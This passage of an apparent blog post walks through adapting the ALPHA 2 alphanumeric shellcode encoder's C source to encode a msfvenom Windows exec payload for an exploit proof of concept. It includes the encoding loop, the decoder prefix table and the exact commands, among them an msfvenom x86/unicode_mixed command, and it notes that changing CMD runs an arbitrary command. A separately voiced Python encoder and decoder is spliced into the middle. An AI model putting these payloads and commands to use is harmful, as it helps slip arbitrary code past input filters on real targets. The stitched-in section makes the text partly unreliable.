    "  YS,  dSb    ,sY\"      " COPYRIGHT "\n"
    "  `\"YSS'\"S' 'SSSSSSSP  \n"
    "________________________________________________________________________________\n"
    "\n"
  );
  exit(EXIT_SUCCESS);
}

void help(char* name)
{
  printf(
    "Usage: %s [OPTION] [BASEADDRESS]\n"
    "ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.\n"
    "The result can optionally be uppercase-only and/or unicode proof. It is an encoded\n"
    "version of your original shellcode. It consists of baseaddress-code with some\n"
    "padding, a decoder routine and the encoded original shellcode. This will work\n"
    "for any target OS. The resulting shellcode needs to have RWE-access to modify\n"
    "its own code and decode the original shellcode in memory.\n"
    "\n"
    "BASEADDRESS\n"
    "  The decoder routine needs to have its baseaddress in specified register(s). The\n"
    "  baseaddress-code copies the baseaddress from the given register or stack\n"
    "  location into the appropriate registers.\n"
    "eax, ecx, edx, ebx, esp, ebp, esi, edi\n"
    "  Take the baseaddress from the given register. (Unicode baseaddress code using\n"
    "  esp will overwrite the byte of memory pointed to by ebp!)\n"
    "[esp], [esp-X], [esp+X]\n"
    "  Take the baseaddress from the stack.\n"
    "seh\n"
    "  The windows \"Structured Exception Handler\" (seh) can be used to calculate\n"
    "  the baseaddress automatically on win32 systems. This option is not available\n"
    "  for unicode-proof shellcodes and the uppercase version isn't 100%% reliable.\n"
    "nops\n"
    "  No baseaddress-code, just padding.  If you need to get the baseaddress from a\n"
    "  source not on the list use this option (combined with --nocompress) and\n"
    "  replace the nops with your own code. The ascii decoder needs the baseaddress\n"
    "  in registers ecx and edx, the unicode-proof decoder only in ecx.\n"
    "-n\n"
    "  Do not output a trailing newline after the shellcode.\n"
    "--nocompress\n"
    "  The baseaddress-code uses \"dec\"-instructions to lower the required padding\n"
    "  length. The unicode-proof code will overwrite some bytes in front of the\n"
    "  shellcode as a result. Use this option if you do not want the \"dec\"-s.\n"
    "--unicode\n"
    "  Make shellcode unicode-proof. This means it will only work when it gets\n"
    "  converted to unicode (inserting a '0' after each byte) before it gets\n"
    "  executed.\n"
    "--uppercase\n"
    "  Make shellcode 100%% uppercase characters, uses a few more bytes than\n"
    "  mixedcase shellcodes.\n"
    "--sources\n"
    "  Output a list of BASEADDRESS options for the given combination of --uppercase\n"
    "  and --unicode.\n"
    "--help\n"
    "  Display this help and exit\n"
    "--version\n"
    "  Output version information and exit\n"
    "\n"
    "See the source-files for further details and copying conditions. There is NO\n"
    "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
    "\n"
    "Acknowledgements:\n"
    "  Thanks to rix for his phrack article on alphanumeric shellcode.\n"
    "  Thanks to obscou for his phrack article on unicode-proof shellcode.\n"
    "  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"
    "\n"
    "Report bugs to \n",
    name
  );
  exit(EXIT_SUCCESS);
}

//-----------------------------------------------------------------------------
int main(int argc, char* argv[])
{
  int   uppercase = 0, unicode = 0, sources = 0,
        nonewline = 0, nocompress = 0, options = 0, spaces = 0;
  char* baseaddress = NULL;
  int   i, input, A, B, C, D, E, F;
  const char* valid_chars;

  // Random seed (disabled: gettimeofday() is not available on MSVC, so the
  // free nibbles are chosen from the unseeded rand() sequence and the output
  // is the same on every run)
  //struct timeval tv;
  //struct timezone tz;
  //gettimeofday(&tv, &tz);
  //srand((int)tv.tv_sec*1000+tv.tv_usec);

  // Scan all the options and set internal variables accordingly
  for (i = 1; i < argc; i++)
  {
    if (strcmp(argv[i], "--help") == 0) help(argv[0]);
    else if (strcmp(argv[i], "--version") == 0) version();
    else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
    else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
    else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
    else if (strcmp(argv[i], "--sources") == 0) sources = 1;
    else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
    else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
    else if (baseaddress == NULL) baseaddress = argv[i];
    else
    {
      fprintf(stderr, "%s: more than one BASEADDRESS option: `%s' and `%s'\n"
                      "Try `%s --help' for more information.\n",
                      argv[0], baseaddress, argv[i], argv[0]);
      exit(EXIT_FAILURE);
    }
  }

  // No baseaddress option ?
  if (baseaddress == NULL)
  {
    fprintf(stderr, "%s: missing BASEADDRESS option.\n"
                    "Try `%s --help' for more information.\n", argv[0], argv[0]);
    exit(EXIT_FAILURE);
  }

  // The uppercase, unicode and nocompress option determine which decoder we'll
  // need to use. For each combination of these options there is an array,
  // indexed by the baseaddress with decoders. Pointers to these arrays have
  // been put in another array, we can calculate the index into this second
  // array like this:
  options = uppercase + unicode*2 + nocompress*4;
  // decoders[options] will now point to an array of decoders for the specified
  // options. The array contains one decoder for every possible baseaddress.

  // Someone wants to know which baseaddress options the specified options
  // for uppercase, unicode and/or nocompress allow:
  if (sources)
  {
    printf("Available options for %s%s alphanumeric shellcode:\n",
           uppercase ? "uppercase" : "mixedcase",
           unicode ? " unicode-proof" : "");
    for (i = 0; decoders[options][i].id != NULL; i++)
    {
      printf("  %s\n", decoders[options][i].id);
    }
    printf("\n");
    exit(EXIT_SUCCESS);
  }

  // Character set the encoder may emit. 'A' is deliberately absent: it is the
  // terminator the decoder stub looks for (see the final printf below).
  //TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI
  if (uppercase)
  {
    if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
    else        valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
  } else
  {
    if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    else        valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  }

  // Find and output decoder
  for (i = 0; _stricmp(baseaddress, decoders[options][i].id) != 0; i++)
  {
    if (decoders[options][i+1].id == NULL)
    {
      fprintf(stderr, "%s: unrecognized baseaddress option `%s'\n"
                      "Try `%s %s%s--sources' for a list of BASEADDRESS options.\n",
                      argv[0], baseaddress, argv[0],
                      uppercase ? "--uppercase " : "",
                      unicode ? "--unicode " : "");
      exit(EXIT_FAILURE);
    }
  }
  printf("%s", decoders[options][i].code);
  // system("pause");

  // read, encode and output shellcode (taken from evil[] instead of stdin;
  // sizeof(evil)-1 leaves out the terminating NUL of the string literal)
  for (int j = 0; j < (int)sizeof(evil) - 1; j++)
  {
    input = evil[j];
    // encoding AB -> CD 00 EF 00
    A = (input & 0xf0) >> 4;
    B = (input & 0x0f);
    F = B;
    // E is arbitrary as long as EF is a valid character
    i = (int)(rand() % strlen(valid_chars));
    while ((valid_chars[i] & 0x0f) != F) { i = (int)((i + 1) % strlen(valid_chars)); }
    E = valid_chars[i] >> 4;
    // normal code uses xor, unicode-proof uses ADD.
    // AB ->
    D = unicode ? (A-E) & 0x0f : (A^E);
    // C is arbitrary as long as CD is a valid character
    i = (int)(rand() % strlen(valid_chars));
    while ((valid_chars[i] & 0x0f) != D) { i = (int)((i + 1) % strlen(valid_chars)); }
    C = valid_chars[i] >> 4;
    printf("%c%c", (C<<4)+D, (E<<4)+F);
  }
  // Usage from the command line: alpha2 esp
  // (when esp points at the shellcode)
  printf("A%s", nonewline ? "" : "\n"); // Terminating "A"
  exit(EXIT_SUCCESS);
}

To use it, replace the `evil` array with your own shellcode, build the exe, and run it to produce the encoding.

The `evil` bytes above were generated with `msfvenom -p windows/exec CMD="calc.exe" -f c -b '\x00'`; the result launches the calculator exactly like the author's PoC. Changing the content of CMD runs an arbitrary command instead.
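The nibble arithmetic in the encoding loop above (AB becomes the two characters CD EF, with F = B, and D = A xor E for the ASCII decoder or D = A - E mod 16 for the unicode-proof one) is easy to state but hard to verify by running shellcode. The following added example, not code from the post or from ALPHA 2, mirrors that loop in Python and adds the inverse, so an encoded payload can be decoded offline and compared with the raw `evil` bytes; it also widens the encoded string the way an ANSI-to-Unicode conversion does (a 0x00 after every byte) and decodes that form, and maps the first 14 characters of a payload back to the BASEADDRESS option from the uppercase unicode-proof `--nocompress` table above (the check used earlier on the `VVYA4444444444` prefix). The free nibbles are chosen deterministically instead of with `rand()`, the sample bytes are constructed, and the inverse is derived from the encoding comments, not from emulating the decoder stub.

```python
"""ALPHA 2 style alphanumeric encoding and its inverse (added example)."""

UPPER = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ"          # 'A' is the terminator
MIXED = UPPER + "abcdefghijklmnopqrstuvwxyz"


def _pick(charset: str, low_nibble: int, seed: int) -> int:
    """Return a charset byte whose low nibble is low_nibble.

    Deterministic stand-in for ALPHA 2's rand(): start at seed and walk the
    charset until a character with the wanted low nibble is found.
    """
    n = len(charset)
    i = seed % n
    for _ in range(n):
        c = ord(charset[i])
        if c & 0x0F == low_nibble:
            return c
        i = (i + 1) % n
    raise ValueError(f"no character with low nibble {low_nibble:x}")


def alpha2_encode(data: bytes, unicode: bool = False, uppercase: bool = False) -> bytes:
    """Encode raw bytes as the body ALPHA 2 prints after its decoder prefix."""
    charset = UPPER if uppercase else MIXED
    out = bytearray()
    for k, byte in enumerate(data):
        a, b = byte >> 4, byte & 0x0F
        ef = _pick(charset, b, k)             # second char carries the low nibble as-is
        e = ef >> 4
        d = (a - e) & 0x0F if unicode else a ^ e
        cd = _pick(charset, d, 7 * k + 3)     # first char carries the transformed high nibble
        out += bytes((cd, ef))
    return bytes(out) + b"A"                  # terminating "A", as in the C source


def widen_to_utf16le(encoded: bytes) -> bytes:
    """What an ANSI->Unicode conversion does to the payload: 0x00 after each byte."""
    return b"".join(bytes((c, 0)) for c in encoded)


def alpha2_decode(encoded: bytes, unicode: bool = False) -> bytes:
    """Undo the nibble arithmetic: A = D xor E (ASCII) or (D + E) mod 16 (unicode)."""
    body = encoded
    # An encoded string never contains 0x00, so interleaved NULs mean widened input.
    if body and len(body) % 2 == 0 and all(body[k] == 0 for k in range(1, len(body), 2)):
        body = body[::2]
    if body.endswith(b"A"):
        body = body[:-1]
    if len(body) % 2:
        raise ValueError("encoded payload must be an even number of characters")
    out = bytearray()
    for i in range(0, len(body), 2):
        cd, ef = body[i], body[i + 1]
        d, e, f = cd & 0x0F, ef >> 4, ef & 0x0F
        a = (d + e) & 0x0F if unicode else d ^ e
        out.append((a << 4) | f)
    return bytes(out)


# Prefixes of the uppercase, unicode-proof, --nocompress decoders, taken from
# the table in the ALPHA 2 source above ("nops" and "ecx" share one prefix).
UPPER_UNICODE_NOCOMPRESS_PREFIX = {
    "44444444444444": "nops/ecx",
    "PPYA4444444444": "eax",
    "RRYA4444444444": "edx",
    "SSYA4444444444": "ebx",
    "TUYA4444444444": "esp",
    "UUYA4444444444": "ebp",
    "VVYA4444444444": "esi",
    "WWYA4444444444": "edi",
    "YA444444444444": "[esp]",
    "YUYA4444444444": "[esp+4]",
}


def baseaddress_from_prefix(shellcode: bytes):
    """Which BASEADDRESS option produced this uppercase unicode-proof payload."""
    return UPPER_UNICODE_NOCOMPRESS_PREFIX.get(shellcode[:14].decode("ascii", "replace"))


if __name__ == "__main__":
    sample = b"\xda\xd1\xd9\x74\x24\xf4"       # constructed: first bytes of evil[]
    enc = alpha2_encode(sample, unicode=True, uppercase=True)
    print(enc.decode())
    print(alpha2_decode(widen_to_utf16le(enc), unicode=True) == sample)
    print(baseaddress_from_prefix(b"VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5"))
```

Decoding the post's own shellcode this way means stripping the decoder prefix first (the 14-character base-address code plus `uppercase_unicode_decoder_body`), after which the remaining characters up to the final `A` are the encoded payload.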

Looking closely, the prefix VVYA4444444444 of the author's PoC shellcode appears in the following fragment:

uppercase_unicode_nocompress_decoders[] = {
  { "nops",     "44444444444444" uppercase_unicode_decoder_body },
  { "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },
  { "ecx",      "44444444444444" uppercase_unicode_decoder_body },
  { "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },
  { "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },
  { "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },
  { "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },
  { "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },
  { "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },
  { "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },
  { "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },
  { NULL, NULL }
};

So now we know the parameters the author used (uppercase, unicode-proof, --nocompress, base address in esi), and the final shellcode is generated with the following command, where ConsoleApplication1.exe is built from the code above:

ConsoleApplication1.exe --nocompress --unicode --uppercase esi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



Replace the shellcode in the original PoC with this output and the calculator launches successfully.

0x02 Postscript

In fact, because I was unfamiliar with shellcode I went the long way round to generate it; it can be produced directly with msf...


From 昊天實驗室 (Haotian Lab)


At first the shellcode generated with the msf encoder had garbage at the start, which led to the previous article and a long detour.

In the end a tip from a more experienced colleague showed that the cause was simply not specifying the register at the outset.

So this single command produces usable shellcode directly:

msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=ESI

Copyright belongs to the author; contact the author for reprints or content cooperation.
Platform statement: the article content (including any images or video) was uploaded and published by the author and represents the author's own views only; 簡書 (Jianshu) is an information-publishing platform that provides storage only.